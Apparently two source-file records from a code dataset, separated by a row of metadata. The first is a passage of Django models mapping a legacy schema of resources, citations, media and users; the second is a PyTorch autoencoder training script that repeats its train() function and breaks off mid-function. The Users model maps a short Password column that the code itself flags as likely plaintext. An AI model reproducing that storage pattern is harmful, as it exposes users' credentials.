    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'resourceactivitycitationevents'
        unique_together = (('resourceactivityid', 'citationid'),)
class Resourceactivitymediaevents(models.Model):
    """Join table relating resource-activity events to media (unmanaged).

    Natural key is (resourceactivityid, mediaid); Django still assumes an
    implicit `id` column — TODO confirm against the legacy schema.
    """
    # `on_delete` is required on ForeignKey since Django 2.0. DO_NOTHING is the
    # inspectdb convention for unmanaged tables. String target: the model is
    # declared later in the module.
    resourceactivityid = models.ForeignKey('Resourcesactivityevents', on_delete=models.DO_NOTHING, db_column='ResourceActivityID')  # Field name made lowercase.
    mediaid = models.IntegerField(db_column='MediaID')  # Field name made lowercase.
    relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    pages = models.CharField(db_column='Pages', max_length=50, blank=True, null=True)  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'resourceactivitymediaevents'
        unique_together = (('resourceactivityid', 'mediaid'),)
class Resourcealtindigenousname(models.Model):
    """Alternate indigenous name for a resource (unmanaged legacy table)."""
    altindigenousnameid = models.IntegerField(db_column='AltIndigenousNameID', primary_key=True)  # Field name made lowercase.
    # Plain integer rather than a ForeignKey to Resources — presumably a soft
    # reference; confirm before adding a DB-level constraint.
    resourceid = models.IntegerField(db_column='ResourceID', blank=True, null=True)  # Field name made lowercase.
    altindigenousname = models.CharField(db_column='AltIndigenousName', max_length=255, blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'resourcealtindigenousname'
class Resourceresourceevents(models.Model):
    """Self-referential relationship between two resources (unmanaged).

    Natural key is (resourceid, altresourceid); Django still assumes an
    implicit `id` column — TODO confirm against the legacy schema.
    """
    resourceid = models.IntegerField(db_column='ResourceID')  # Field name made lowercase.
    altresourceid = models.IntegerField(db_column='AltResourceID')  # Field name made lowercase.
    relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'resourceresourceevents'
        unique_together = (('resourceid', 'altresourceid'),)
class Resources(models.Model):
    """A natural/cultural resource (species or item) in the legacy `resources` table."""
    resourceid = models.IntegerField(db_column='ResourceID', primary_key=True)  # Field name made lowercase.
    commonname = models.CharField(db_column='CommonName', max_length=255, blank=True, null=True)  # Field name made lowercase.
    indigenousname = models.CharField(db_column='IndigenousName', max_length=255, blank=True, null=True)  # Field name made lowercase.
    genus = models.CharField(db_column='Genus', max_length=255, blank=True, null=True)  # Field name made lowercase.
    species = models.CharField(db_column='Species', max_length=255, blank=True, null=True)  # Field name made lowercase.
    # Integer flag (0/1) column — matches the legacy schema.
    specific = models.IntegerField(db_column='Specific')  # Field name made lowercase.
    resourceclassificationgroup = models.CharField(db_column='ResourceClassificationGroup', max_length=255, blank=True, null=True)  # Field name made lowercase.
    islocked = models.IntegerField(db_column='IsLocked')  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'resources'
class Resourcesactivityevents(models.Model):
    """An activity performed with a resource at a place (unmanaged legacy table)."""
    resourceactivityid = models.IntegerField(db_column='ResourceActivityID', primary_key=True)  # Field name made lowercase.
    # `on_delete` is required on ForeignKey since Django 2.0. DO_NOTHING is the
    # inspectdb convention for unmanaged tables.
    placeresourceid = models.ForeignKey(Placesresourceevents, on_delete=models.DO_NOTHING, db_column='PlaceResourceID', blank=True, null=True)  # Field name made lowercase.
    relationshipdescription = models.TextField(db_column='RelationshipDescription', blank=True, null=True)  # Field name made lowercase.
    partused = models.CharField(db_column='PartUsed', max_length=255, blank=True, null=True)  # Field name made lowercase.
    activityshortdescription = models.CharField(db_column='ActivityShortDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    activitylongdescription = models.TextField(db_column='ActivityLongDescription', blank=True, null=True)  # Field name made lowercase.
    participants = models.CharField(db_column='Participants', max_length=50, blank=True, null=True)  # Field name made lowercase.
    technique = models.CharField(db_column='Technique', max_length=255, blank=True, null=True)  # Field name made lowercase.
    gear = models.CharField(db_column='Gear', max_length=255, blank=True, null=True)  # Field name made lowercase.
    customaryuse = models.CharField(db_column='CustomaryUse', max_length=255, blank=True, null=True)  # Field name made lowercase.
    timing = models.CharField(db_column='Timing', max_length=255, blank=True, null=True)  # Field name made lowercase.
    timingdescription = models.CharField(db_column='TimingDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    islocked = models.IntegerField(db_column='IsLocked')  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'resourcesactivityevents'
class Resourcescitationevents(models.Model):
    """Join table relating Resources rows to Citations rows (unmanaged).

    Natural key is (resourceid, citationid); Django still assumes an implicit
    `id` column — TODO confirm against the legacy schema.
    """
    # `on_delete` is required on ForeignKey since Django 2.0. DO_NOTHING is the
    # inspectdb convention for unmanaged tables.
    resourceid = models.ForeignKey(Resources, on_delete=models.DO_NOTHING, db_column='ResourceID')  # Field name made lowercase.
    citationid = models.ForeignKey(Citations, on_delete=models.DO_NOTHING, db_column='CitationID')  # Field name made lowercase.
    relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    pages = models.CharField(db_column='Pages', max_length=255, blank=True, null=True)  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'resourcescitationevents'
        unique_together = (('resourceid', 'citationid'),)
class Resourcesmediaevents(models.Model):
    """Join table relating Resources rows to Media rows (unmanaged).

    Natural key is (resourceid, mediaid); Django still assumes an implicit
    `id` column — TODO confirm against the legacy schema.
    """
    # `on_delete` is required on ForeignKey since Django 2.0. DO_NOTHING is the
    # inspectdb convention for unmanaged tables.
    resourceid = models.ForeignKey(Resources, on_delete=models.DO_NOTHING, db_column='ResourceID')  # Field name made lowercase.
    mediaid = models.ForeignKey(Media, on_delete=models.DO_NOTHING, db_column='MediaID')  # Field name made lowercase.
    relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    pages = models.CharField(db_column='Pages', max_length=50, blank=True, null=True)  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'resourcesmediaevents'
        unique_together = (('resourceid', 'mediaid'),)
class Useraccess(models.Model):
    """Lookup table of access levels (legacy table `useraccess`).

    Generated by `inspectdb`; unmanaged — Django does not create or migrate it.
    Users.accesslevel appears to reference these rows by integer id (plain
    IntegerField, not an FK — confirm against the schema).
    """
    accessid = models.IntegerField(db_column='AccessID', primary_key=True)  # Field name made lowercase.
    accesslevel = models.CharField(db_column='AccessLevel', max_length=255, blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False
        db_table = 'useraccess'
class Users(models.Model):
    """Application user accounts (legacy table `users`).

    Generated by `inspectdb`; unmanaged. Not integrated with Django's auth
    framework — this maps a pre-existing schema as-is.
    """
    userid = models.IntegerField(db_column='UserID', primary_key=True)  # Field name made lowercase.
    username = models.CharField(db_column='UserName', max_length=20, blank=True, null=True)  # Field name made lowercase.
    # NOTE(review): a 20-char CharField named Password suggests plaintext or
    # legacy-hashed storage — flagging as a security concern; verify upstream.
    password = models.CharField(db_column='Password', max_length=20, blank=True, null=True)  # Field name made lowercase.
    firstname = models.CharField(db_column='FirstName', max_length=255, blank=True, null=True)  # Field name made lowercase.
    lastname = models.CharField(db_column='LastName', max_length=255, blank=True, null=True)  # Field name made lowercase.
    affiliation = models.CharField(db_column='Affiliation', max_length=255, blank=True, null=True)  # Field name made lowercase.
    title = models.CharField(db_column='Title', max_length=255, blank=True, null=True)  # Field name made lowercase.
    # integer id; presumably references Useraccess.accessid (no FK declared)
    accesslevel = models.IntegerField(db_column='AccessLevel', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False
        db_table = 'users'
| 72.257053
| 160
| 0.75167
| 5,519
| 46,100
| 6.167784
| 0.044392
| 0.075206
| 0.122209
| 0.206816
| 0.80329
| 0.801939
| 0.777145
| 0.764571
| 0.743449
| 0.743449
| 0
| 0.014255
| 0.141757
| 46,100
| 637
| 161
| 72.370487
| 0.846101
| 0.197874
| 0
| 0.586826
| 1
| 0
| 0.13717
| 0.020356
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.001996
| 0.003992
| 0
| 0.810379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
f7a4d74c3913cf9ab855f803464d38cba66582f0
| 28,868
|
py
|
Python
|
autoencoder/Training.py
|
JosephZheng1998/CNN-Emotion-Detection
|
f56e99103be7a90a52b8ee51c8ae30cdd0051d5c
|
[
"MIT"
] | null | null | null |
autoencoder/Training.py
|
JosephZheng1998/CNN-Emotion-Detection
|
f56e99103be7a90a52b8ee51c8ae30cdd0051d5c
|
[
"MIT"
] | null | null | null |
autoencoder/Training.py
|
JosephZheng1998/CNN-Emotion-Detection
|
f56e99103be7a90a52b8ee51c8ae30cdd0051d5c
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
from PIL import Image
import torch
import torchvision
from torchvision import transforms
import torchvision.models as models
from torchvision.datasets import ImageFolder
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader, random_split
from sklearn.metrics import roc_auc_score
from IPython.display import Image
from IPython.core.display import Image, display
from torchvision.utils import save_image
import time
import pandas as pd
import matplotlib.pyplot as plt
import random
def preprocessing(batch_size=64, num_workers=16, train_root='train/',
                  val_root='val_test/val/', test_root='val_test/test/'):
    """Build train/dev/test DataLoaders from on-disk ImageFolder directories.

    Generalized: batch size, worker count and dataset roots are now
    parameters with the previous hard-coded values as defaults, so existing
    `preprocessing()` call sites behave identically.

    Training data gets rotation/flip augmentation; val and test only get
    normalization (ImageNet mean/std). Prints dataset sizes.

    Returns:
        (train_loader, dev_loader, test_loader)
    """
    # ImageNet statistics — standard for models pretrained on ImageNet
    normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
                                     std=[0.229, 0.224, 0.225])
    train_transform = transforms.Compose([
        transforms.RandomRotation(45),
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        normalize])
    val_transform = transforms.Compose([
        transforms.ToTensor(),
        normalize])
    train_dataset = ImageFolder(root=train_root, transform=train_transform)
    train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True,
                              num_workers=num_workers, pin_memory=True)
    dev_dataset = ImageFolder(root=val_root, transform=val_transform)
    dev_loader = DataLoader(dev_dataset, batch_size=batch_size, shuffle=False,
                            num_workers=num_workers, pin_memory=True)
    test_dataset = ImageFolder(root=test_root, transform=val_transform)
    test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False,
                             num_workers=num_workers, pin_memory=True)
    print('train dataset: {} images {} classes'.format(len(train_dataset), len(train_dataset.classes)))
    print('dev dataset: {} images {} classes'.format(len(dev_dataset), len(dev_dataset.classes)))
    print('test dataset: {} images {} classes'.format(len(test_dataset), len(test_dataset.classes)))
    return train_loader, dev_loader, test_loader
# train the multitasking model
def train(model, train_loader, val_loader, recon_criterion, class_criterion, optimizer, scheduler, epochs, device):
    """Jointly train the autoencoder and classifier heads of `model`.

    Per batch the optimized loss is `class_loss + 10*recon_loss`
    (reconstruction weighted 10x). After each epoch, runs `validate`,
    steps `scheduler` on the validation classification loss, and every
    10 completed epochs checkpoints to 'gdrive/MyDrive/complete_model<N>'.

    Returns six per-epoch lists:
    (train_recon_losses, train_class_losses, train_accs,
     val_class_losses, val_recon_losses, val_accs).
    """
    t_start = time.time()
    train_recon_losses = []
    train_class_losses = []
    train_accs = []
    val_class_losses = []
    val_recon_losses = []
    val_accs = []
    for epoch in range(epochs):
        model.train()
        running_recon_loss = 0
        running_class_loss = 0
        total = 0
        correct = 0
        for idx, (images, labels) in enumerate(train_loader):
            images, labels = images.to(device), labels.to(device)
            optimizer.zero_grad()
            # encoder yields features plus index lists that the decoder
            # consumes — presumably pooling indices for unpooling; confirm
            # against the model definition.
            features, idx_list = model.encoder.forward(images)
            output = model.classifier.forward(features)
            recon_images = model.decoder.forward(features, idx_list)
            class_loss = class_criterion(output, labels)
            recon_loss = recon_criterion(recon_images, images)
            # reconstruction term weighted 10x relative to classification
            total_loss = class_loss + 10*recon_loss
            total_loss.backward()
            #class_loss.backward()
            optimizer.step()
            preds = torch.argmax(output, dim=1)
            correct += (preds == labels).sum().item()
            # accumulate per-sample loss sums; divided by `total` after the epoch
            running_recon_loss += float(recon_loss.item() * images.shape[0])
            running_class_loss += float(class_loss.item() * images.shape[0])
            total += images.shape[0]
            #recon_loss = 0
            # free batch tensors eagerly and flush the CUDA cache to keep
            # GPU memory bounded between batches
            del images
            del labels
            del recon_images
            del features
            del idx_list
            del output
            del recon_loss
            del class_loss
            del preds
            del total_loss
            torch.cuda.empty_cache()
        val_class_loss, val_recon_loss, val_acc = validate(model, val_loader, recon_criterion, class_criterion, device)
        # NOTE(review): validation total is the unweighted sum while training
        # optimized class + 10*recon — confirm the asymmetry is intended.
        val_total_loss = val_recon_loss + val_class_loss
        train_recon_loss = running_recon_loss/total
        train_class_loss = running_class_loss/total
        train_total_loss = train_recon_loss + train_class_loss
        train_acc = correct/total
        train_recon_losses.append(train_recon_loss)
        train_class_losses.append(train_class_loss)
        train_accs.append(train_acc)
        val_class_losses.append(val_class_loss)
        val_recon_losses.append(val_recon_loss)
        val_accs.append(val_acc)
        # plateau scheduler keyed on validation classification loss
        scheduler.step(val_class_loss)
        to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Total Loss: {:.5f}, Train Recon Loss: {:.5f}, Train Class Loss: {:.5f} Train Accuracy: {:.5f}, Val Total Loss: {:.5f}, Val Recon Loss: {:.5f}, Val Class Loss: {:.5f}, Val Accuracy: {:.5f}".format(
            epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_total_loss, train_recon_loss, train_class_loss, train_acc,
            val_total_loss, val_recon_loss, val_class_loss, val_acc)
        print(to_print)
        # checkpoint every 10 completed epochs (epoch is 0-based)
        if (epoch+1) % 10 == 0:
            saved_model = {
                'train_epochs': epoch + 1,
                'model': model.state_dict(),
                'optimizer': optimizer.state_dict(),
                'recon_criterion': recon_criterion.state_dict(),
                'class_criterion': class_criterion.state_dict(),
                'scheduler': scheduler.state_dict(),
                'train_class_losses': train_class_losses,
                'train_recon_losses': train_recon_losses,
                'train_accuracy': train_accs,
                'valid_class_losses': val_class_losses,
                'valid_accuracy': val_accs,
                'val_recon_losses': val_recon_losses,
            }
            torch.save(saved_model, 'gdrive/MyDrive/complete_model{}'.format(epoch+1))
    return train_recon_losses, train_class_losses, train_accs, val_class_losses, val_recon_losses, val_accs
# validate the multitasking model
def validate(model, val_loader, recon_criterion, class_criterion, device):
    """Evaluate the multitask autoencoder+classifier on `val_loader`.

    Runs under `torch.no_grad()` in eval mode. Losses are accumulated as
    per-sample sums and averaged over the total sample count.

    Returns:
        (mean class loss, mean recon loss, accuracy) as Python floats.
    """
    model.eval()
    correct = 0
    total = 0
    running_recon_loss = 0
    running_class_loss = 0
    with torch.no_grad():
        for idx, (images, labels) in enumerate(val_loader):
            images, labels = images.to(device), labels.to(device)
            features, idx_list = model.encoder.forward(images)
            output = model.classifier.forward(features)
            recon_images = model.decoder.forward(features, idx_list)
            class_loss = class_criterion(output, labels)
            recon_loss = recon_criterion(recon_images, images)
            running_recon_loss += float(recon_loss.item() * labels.shape[0])
            # Fix: extract the scalar with .item() before weighting, matching
            # the recon accumulation above (previously multiplied the 0-d loss
            # tensor directly, doing the arithmetic on-device for no reason).
            running_class_loss += float(class_loss.item() * labels.shape[0])
            total += labels.shape[0]
            preds = torch.argmax(output, dim=1)
            correct += (preds == labels).sum().item()
            # free batch tensors eagerly to keep GPU memory bounded
            del images, labels, recon_images, features, idx_list
            del output, recon_loss, class_loss, preds
            torch.cuda.empty_cache()
    return running_class_loss/total, running_recon_loss/total, correct/total
# only train the autoencoder part of the model
def pretrain(model, train_loader, val_loader, criterion, optimizer, scheduler, epochs, device):
    """Train only the autoencoder (encoder + decoder); classifier untouched.

    Validates reconstruction loss each epoch via `pre_validate`, steps
    `scheduler` on it, and checkpoints every 10 completed epochs to
    'gdrive/MyDrive/pre_model<N>'.

    Returns:
        (train_recon_losses, val_recon_losses) — per-epoch mean losses.
    """
    t_start = time.time()
    train_recon_losses = []
    val_recon_losses = []
    for epoch in range(epochs):
        model.train()
        running_recon_loss = 0
        total = 0
        for idx, (images, labels) in enumerate(train_loader):
            images, labels = images.to(device), labels.to(device)
            optimizer.zero_grad()
            features, idx_list = model.encoder.forward(images)
            recon_images = model.decoder.forward(features, idx_list)
            recon_loss = criterion(recon_images, images)
            recon_loss.backward()
            optimizer.step()
            # per-sample loss sum; averaged by `total` after the epoch
            running_recon_loss += float(recon_loss.item() * images.shape[0])
            total += images.shape[0]
            # free batch tensors eagerly to keep GPU memory bounded
            del images, labels, recon_images, features, idx_list, recon_loss
            torch.cuda.empty_cache()
        val_recon_loss = pre_validate(model, val_loader, criterion, device)
        train_recon_loss = running_recon_loss/total
        train_recon_losses.append(train_recon_loss)
        val_recon_losses.append(val_recon_loss)
        scheduler.step(val_recon_loss)
        to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Recon Loss: {:.5f}, Val Recon Loss: {:.5f}".format(
            epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_recon_loss,
            val_recon_loss)
        print(to_print)
        # Consistency fix: checkpoint every 10 *completed* epochs and name the
        # file with that same count, matching train()/train_class(). Previously
        # this saved at epoch 0 (after one epoch) and the filename lagged the
        # stored 'train_epochs' value by one.
        if (epoch+1) % 10 == 0:
            saved_model = {
                'train_epochs': epoch + 1,
                'model': model.state_dict(),
                'optimizer': optimizer.state_dict(),
                'recon_criterion': criterion.state_dict(),
                'scheduler': scheduler.state_dict(),
            }
            torch.save(saved_model, 'gdrive/MyDrive/pre_model{}'.format(epoch+1))
    return train_recon_losses, val_recon_losses
# only validate the autoencoder part of the model
def pre_validate(model, val_loader, recon_criterion, device):
    """Return the mean reconstruction loss of the autoencoder over `val_loader`.

    Runs in eval mode with gradients disabled; only the encoder/decoder path
    is exercised (the classifier is never called).
    """
    model.eval()
    loss_sum = 0
    n_seen = 0
    with torch.no_grad():
        for batch_images, batch_labels in val_loader:
            batch_images = batch_images.to(device)
            batch_labels = batch_labels.to(device)
            encoded, pool_indices = model.encoder.forward(batch_images)
            decoded = model.decoder.forward(encoded, pool_indices)
            batch_loss = recon_criterion(decoded, batch_images)
            # per-sample loss sum, averaged by n_seen at the end
            loss_sum += float(batch_loss.item() * batch_labels.shape[0])
            n_seen += batch_images.shape[0]
            # drop per-batch tensors and flush cached GPU memory
            del batch_images, batch_labels, decoded, encoded, pool_indices, batch_loss
            torch.cuda.empty_cache()
    return loss_sum / n_seen
# only train the model's classifier
def train_class(model, train_loader, val_loader, criterion, optimizer, scheduler, epochs, device):
    """Train only the classifier head; the encoder provides frozen features.

    The encoder still runs forward, but its output is `.detach()`ed so
    gradients never reach it — only classifier weights update. Validates
    each epoch via `validate_class`, steps `scheduler` on the validation
    class loss, and checkpoints every 10 completed epochs.

    Returns four per-epoch lists:
    (train_class_losses, train_accs, val_class_losses, val_accs).
    """
    t_start = time.time()
    train_class_losses = []
    train_accs = []
    val_class_losses = []
    val_accs = []
    for epoch in range(epochs):
        model.train()
        running_class_loss = 0
        total = 0
        correct = 0
        for idx, (images, labels) in enumerate(train_loader):
            images, labels = images.to(device), labels.to(device)
            optimizer.zero_grad()
            features, idx_list = model.encoder.forward(images)
            # detach: block gradient flow into the encoder
            features = features.detach()
            output = model.classifier.forward(features)
            class_loss = criterion(output, labels)
            class_loss.backward()
            optimizer.step()
            preds = torch.argmax(output, dim=1)
            correct += (preds == labels).sum().item()
            # per-sample loss sum; averaged by `total` after the epoch
            running_class_loss += float(class_loss.item() * images.shape[0])
            total += images.shape[0]
            # free batch tensors eagerly to keep GPU memory bounded
            del images
            del labels
            del features
            del idx_list
            del output
            del class_loss
            del preds
            torch.cuda.empty_cache()
        val_class_loss, val_acc = validate_class(model, val_loader, criterion, device)
        train_class_loss = running_class_loss/total
        train_acc = correct/total
        train_class_losses.append(train_class_loss)
        train_accs.append(train_acc)
        val_class_losses.append(val_class_loss)
        val_accs.append(val_acc)
        scheduler.step(val_class_loss)
        to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Class Loss: {:.5f} Train Accuracy: {:.5f}, Val Class Loss: {:.5f}, Val Accuracy: {:.5f}".format(
            epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_class_loss, train_acc,
            val_class_loss, val_acc)
        print(to_print)
        if (epoch+1) % 10 == 0:
            saved_model = {
                'train_epochs': epoch + 1,
                'model': model.state_dict(),
                'optimizer': optimizer.state_dict(),
                'criterion': criterion.state_dict(),
                'scheduler': scheduler.state_dict(),
                'train_class_losses': train_class_losses,
                'train_accuracy': train_accs,
                'valid_class_losses': val_class_losses,
                'valid_accuracy': val_accs,
            }
            # NOTE(review): same filename pattern as train()'s checkpoints
            # ('complete_model<N>') — running both will overwrite; confirm.
            torch.save(saved_model, 'gdrive/MyDrive/complete_model{}'.format(epoch+1))
    return train_class_losses, train_accs, val_class_losses, val_accs
# only validate the model's classifier
def validate_class(model, val_loader, criterion, device):
    """Evaluate only the classifier head (encoder features detached).

    Returns:
        (mean class loss, accuracy) averaged over the samples seen.
    """
    model.eval()
    correct = 0
    total = 0
    running_class_loss = 0
    with torch.no_grad():
        for idx, (images, labels) in enumerate(val_loader):
            images, labels = images.to(device), labels.to(device)
            features, idx_list = model.encoder.forward(images)
            features = features.detach()
            output = model.classifier.forward(features)
            # Bug fix: use the `criterion` parameter. The original referenced
            # the global `class_criterion`, which only exists when the file is
            # run as a script — any other caller got a NameError, and even in
            # the script the argument passed in was silently ignored.
            class_loss = criterion(output, labels)
            # .item() for consistency with the training loops' accumulation
            running_class_loss += float(class_loss.item() * labels.shape[0])
            total += labels.shape[0]
            preds = torch.argmax(output, dim=1)
            correct += (preds == labels).sum().item()
            # free batch tensors eagerly to keep GPU memory bounded
            del images, labels, features, idx_list, output, class_loss, preds
            torch.cuda.empty_cache()
    return running_class_loss/total, correct/total
"""# Training and Validating Function"""
# train the multitasking model
# NOTE(review): duplicate definition — an identical train() appears earlier in
# this file; this later definition is the one Python keeps. Consider deleting
# one copy.
def train(model, train_loader, val_loader, recon_criterion, class_criterion, optimizer, scheduler, epochs, device):
    """Jointly train the autoencoder and classifier heads of `model`.

    Per batch the optimized loss is `class_loss + 10*recon_loss`
    (reconstruction weighted 10x). After each epoch, runs `validate`,
    steps `scheduler` on the validation classification loss, and every
    10 completed epochs checkpoints to 'gdrive/MyDrive/complete_model<N>'.

    Returns six per-epoch lists:
    (train_recon_losses, train_class_losses, train_accs,
     val_class_losses, val_recon_losses, val_accs).
    """
    t_start = time.time()
    train_recon_losses = []
    train_class_losses = []
    train_accs = []
    val_class_losses = []
    val_recon_losses = []
    val_accs = []
    for epoch in range(epochs):
        model.train()
        running_recon_loss = 0
        running_class_loss = 0
        total = 0
        correct = 0
        for idx, (images, labels) in enumerate(train_loader):
            images, labels = images.to(device), labels.to(device)
            optimizer.zero_grad()
            # encoder yields features plus index lists the decoder consumes —
            # presumably pooling indices for unpooling; confirm in the model.
            features, idx_list = model.encoder.forward(images)
            output = model.classifier.forward(features)
            recon_images = model.decoder.forward(features, idx_list)
